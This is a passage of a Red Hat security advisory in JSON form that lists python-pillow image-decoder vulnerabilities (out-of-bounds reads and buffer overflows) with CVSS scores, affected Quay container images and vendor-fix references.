"8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "python-pillow: multiple out-of-bounds reads in libImaging/FliDecode.c"
},
{
"cve": "CVE-2020-10378",
"cwe": {
"id": "CWE-125",
"name": "Out-of-bounds Read"
},
"discovery_date": "2020-06-25T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1852832"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in python-pillow. In libImaging/PcxDecode.c, an out-of-bounds read occurs when reading PCX files where state-\u003eshuffle is instructed to read beyond state-\u003ebuffer.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-pillow: an out-of-bounds read in libImaging/PcxDecode.c can occur when reading PCX files",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
"8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2020-10378"
},
{
"category": "external",
"summary": "RHBZ#1852832",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1852832"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2020-10378",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-10378"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-10378",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-10378"
}
],
"release_date": "2020-06-25T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-02-04T16:14:00+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
"8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:0420"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
"8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "python-pillow: an out-of-bounds read in libImaging/PcxDecode.c can occur when reading PCX files"
},
{
"cve": "CVE-2020-10379",
"cwe": {
"id": "CWE-120",
"name": "Buffer Copy without Checking Size of Input (\u0027Classic Buffer Overflow\u0027)"
},
"discovery_date": "2020-06-25T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1852836"
}
],
"notes": [
{
"category": "description",
"text": "In Pillow before 7.1.0, there are two Buffer Overflows in libImaging/TiffDecode.c.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-pillow: two buffer overflows in libImaging/TiffDecode.c due to small buffers allocated in ImagingLibTiffDecode()",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "While python-pillow is listed as a dependency of Red Hat Quay, it is not used by the application.\n\nThis issue did not affect the versions of python-pillow as shipped with Red Hat Enterprise Linux 5, 6, 7, and 8 as they provide an older version of the code which does not include the vulnerable code.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
"8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2020-10379"
},
{
"category": "external",
"summary": "RHBZ#1852836",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1852836"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2020-10379",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-10379"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-10379",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-10379"
}
],
"release_date": "2020-06-25T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-02-04T16:14:00+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
"8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:0420"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
"8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "python-pillow: two buffer overflows in libImaging/TiffDecode.c due to small buffers allocated in ImagingLibTiffDecode()"
},
{
"cve": "CVE-2020-10994",
"cwe": {
"id": "CWE-125",
"name": "Out-of-bounds Read"
},
"discovery_date": "2020-06-25T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1852820"
}
],
"notes": [
{
"category": "description",
"text": "An out-of-bounds read flaw was found in python-pillow in the way JP2 images are parsed. An application that uses python-pillow to decode untrusted images may be vulnerable to this issue. This flaw allows an attacker to read data. The highest threat from this vulnerability is to confidentiality.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-pillow: multiple out-of-bounds reads via a crafted JP2 file",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This issue did not affect the versions of python-pillow and python-imaging as shipped with Red Hat Enterprise Linux 5, 6, and 7 as they did not include the JP2 image parser, where the flaw lies.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
"8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2020-10994"
},
{
"category": "external",
"summary": "RHBZ#1852820",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1852820"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2020-10994",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-10994"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-10994",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-10994"
}
],
"release_date": "2020-06-25T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-02-04T16:14:00+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
"8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:0420"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
"8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "python-pillow: multiple out-of-bounds reads via a crafted JP2 file"
},
{
"cve": "CVE-2020-11538",
"cwe": {
"id": "CWE-122",
"name": "Heap-based Buffer Overflow"
},
"discovery_date": "2020-07-01T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1852814"
}
],
"notes": [
{
"category": "description",
"text": "An out-of-bounds read/write flaw was found in python-pillow, in the way SGI RLE images are decoded. An application that uses python-pillow to decode untrusted images may be vulnerable. This flaw allows an attacker to crash the application or potentially execute code on the system. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-pillow: out-of-bounds reads/writes in the parsing of SGI image files in expandrow/expandrow2",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This issue did not affect the versions of python-pillow and python-imaging as shipped with Red Hat Enterprise Linux 5, 6, and 7 as they did not include the SGI RLE image decoder, where the flaw lies.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
"8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2020-11538"
},
{
"category": "external",
"summary": "RHBZ#1852814",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1852814"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2020-11538",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-11538"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-11538",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-11538"
}
],
"release_date": "2020-07-01T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-02-04T16:14:00+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
"8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:0420"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
